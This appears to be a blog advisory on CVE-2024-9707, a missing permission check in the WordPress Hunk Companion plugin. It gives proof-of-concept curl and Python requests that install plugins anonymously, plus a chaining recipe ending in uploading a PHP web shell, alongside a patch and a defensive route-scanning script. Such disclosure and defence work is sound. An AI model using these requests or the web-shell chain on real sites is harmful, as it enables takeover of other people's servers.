CVE-2024-9707 is a serious security bug in the popular Hunk Companion plugin for WordPress. If your website uses this plugin (versions 1.8.4 and below), unauthenticated attackers can install and activate plugins on it without any login. Ultimately this can let them run malicious code on your server, especially if they chain this bug with vulnerabilities in other plugins.

This post breaks down how the exploit works, shows proof-of-concept code, and gives quick fixes and references. You’ll also see why small capability checks can save your site.

The Vulnerability in Simple Terms

- Plugin: WordPress Hunk Companion (WordPress.org)
- Affected Versions: up to and including 1.8.4
- Endpoint: /wp-json/hc/v1/themehunk-import (WordPress REST API)
- Problem: The endpoint doesn’t check whether the caller is logged in or allowed to install/activate plugins.

References to the Bug

- Wordfence Advisory
- WPScan CVE-2024-9707 Report
- Original Changelog / Patch

How the Exploit Works

When a plugin uses WordPress REST API endpoints, it must check if the user is allowed to perform sensitive actions. The endpoint /wp-json/hc/v1/themehunk-import fails to do this. Anyone can POST to it and use it to install or activate a WordPress plugin.

It’s even possible to upload and activate a plugin that contains a backdoor or webshell. This can then be used to execute arbitrary PHP code—remote code execution (RCE)—giving the attacker full control.

Proof-of-Concept Code

Below is an example cURL command that could install and activate a plugin if the endpoint isn’t patched:

curl -X POST "https://victim-site.com/wp-json/hc/v1/themehunk-import" \
     -H "Content-Type: application/json" \
     -d '{
           "action": "install_plugin",
           "plugin_slug": "hello-dolly",
           "activate": true
         }'

The same request in Python with requests:

import requests

api_url = "https://victim-site.com/wp-json/hc/v1/themehunk-import"
data = {
    "action": "install_plugin",
    "plugin_slug": "hello-dolly",
    "activate": True
}
headers = {"Content-Type": "application/json"}
resp = requests.post(api_url, json=data, headers=headers)
print(resp.text)

Note: Replace "hello-dolly" with any plugin slug available on the WordPress plugin repository. If a vulnerable plugin is installed and activated using this approach, RCE is possible.

For example:

1. Install WP File Manager (had previous RCE CVEs)
2. Activate it via this REST API
3. Upload a PHP web shell (like b374k)

If you check the plugin’s /inc/hc-rest-api.php, you’ll find something like this:

register_rest_route('hc/v1', '/themehunk-import', array(
    'methods'  => 'POST',
    'callback' => 'hc_themehunk_import_callback',
    // Missing 'permission_callback'
));

There’s NO permission_callback! Without one, WordPress applies no authorization check, so anyone can hit this endpoint.

Best practice: register the route with a permission_callback that checks the capability the action actually requires, for example:

'permission_callback' => function () { 
    return current_user_can('install_plugins');
}

- Check that your REST endpoints are not exposed to anonymous users for admin tasks.
- Use a security plugin like Wordfence or WPScan to watch for suspicious activity.
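One way to check your own plugins for this pattern, as an added example that is not from the original post or from the Hunk Companion plugin: the Python script below scans PHP source for register_rest_route() calls that either have no permission_callback at all (the CVE-2024-9707 pattern) or make the route public with __return_true. The sample PHP input is constructed for the demonstration, and the function names find_unprotected_routes and audit_plugin_dir are my own.

```python
import re
from pathlib import Path
from typing import List, Tuple

# Constructed sample PHP source (not the plugin's real file) covering the
# three cases the audit distinguishes.
SAMPLE_PHP = r"""<?php
// Case 1: the CVE-2024-9707 pattern, no permission_callback at all
register_rest_route('hc/v1', '/themehunk-import', array(
    'methods'  => 'POST',
    'callback' => 'hc_themehunk_import_callback',
    // Missing 'permission_callback'
));

// Case 2: explicitly public route (fine for read-only, risky for admin actions)
register_rest_route('hc/v1', '/public-info', [
    'methods'             => 'GET',
    'callback'            => 'hc_public_info',
    'permission_callback' => '__return_true',
]);

// Case 3: capability check in place
register_rest_route('hc/v1', '/themehunk-import-safe', array(
    'methods'             => 'POST',
    'callback'            => 'hc_themehunk_import_callback',
    'permission_callback' => function () {
        return current_user_can('install_plugins');
    },
));
"""

CALL_RE = re.compile(r"register_rest_route\s*\(")
# The namespace and the route are the first two string arguments.
ROUTE_RE = re.compile(r"""^\s*(['"])([^'"]*)\1\s*,\s*(['"])([^'"]*)\3""")
# Require '=>' after the key so a comment that merely mentions the key
# (as in Case 1) does not count as a permission check.
PERM_KEY_RE = re.compile(r"""['"]permission_callback['"]\s*=>""")
PUBLIC_RE = re.compile(r"""['"]permission_callback['"]\s*=>\s*['"]__return_true['"]""")


def _call_args(src: str, open_paren: int) -> str:
    """Return the text between the parentheses of the call whose '(' is at
    open_paren, tracking nesting so nested array()/closure parens stay whole."""
    depth = 0
    for i in range(open_paren, len(src)):
        ch = src[i]
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return src[open_paren + 1:i]
    raise ValueError("unbalanced parentheses in register_rest_route call")


def find_unprotected_routes(php_source: str) -> List[Tuple[str, str]]:
    """Return (route, reason) for every register_rest_route() call that has no
    permission_callback or makes the route public with __return_true."""
    findings = []
    for m in CALL_RE.finditer(php_source):
        args = _call_args(php_source, m.end() - 1)
        rm = ROUTE_RE.match(args)
        route = f"{rm.group(2).strip('/')}/{rm.group(4).strip('/')}" if rm else "<unknown>"
        if not PERM_KEY_RE.search(args):
            findings.append((route, "missing permission_callback"))
        elif PUBLIC_RE.search(args):
            findings.append((route, "permission_callback is __return_true"))
    return findings


def audit_plugin_dir(plugin_dir: str) -> List[Tuple[str, str, str]]:
    """Walk a plugin directory and return (file, route, reason) findings."""
    results = []
    for path in Path(plugin_dir).rglob("*.php"):
        text = path.read_text(encoding="utf-8", errors="replace")
        for route, reason in find_unprotected_routes(text):
            results.append((str(path), route, reason))
    return results


if __name__ == "__main__":
    # Run the audit over the constructed sample; point audit_plugin_dir at
    # wp-content/plugins/<plugin> to scan a real install.
    for route, reason in find_unprotected_routes(SAMPLE_PHP):
        print(f"{route}: {reason}")
```

The scan is a source-level heuristic, not a PHP parser, so treat a clean result as a starting point rather than proof. Also note that since WordPress 5.5 a missing permission_callback only triggers a _doing_it_wrong notice in the debug log; the route is still registered and still reachable by anonymous callers, so the notice is a symptom, not a mitigation. A __return_true finding is acceptable for genuinely public read-only data, but never for routes that install, activate, or modify anything.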

Conclusion

CVE-2024-9707 is a classic example of why every REST API endpoint in WordPress must check capabilities. Left open, it becomes a backdoor for attackers to install and activate any plugin—including those that can be further subverted to get full control of your server.

If you use Hunk Companion, update now! If you’re a plugin developer, never skip permission checks.

Further Reading and Resources

1. NVD CVE-2024-9707
2. WPScan Report
3. Wordfence Threat Intelligence
4. WordPress.org plugin page
5. Secure Your WordPress REST API

Timeline

Published on: 10/11/2024 13:15:21 UTC
Last modified on: 10/15/2024 12:58:51 UTC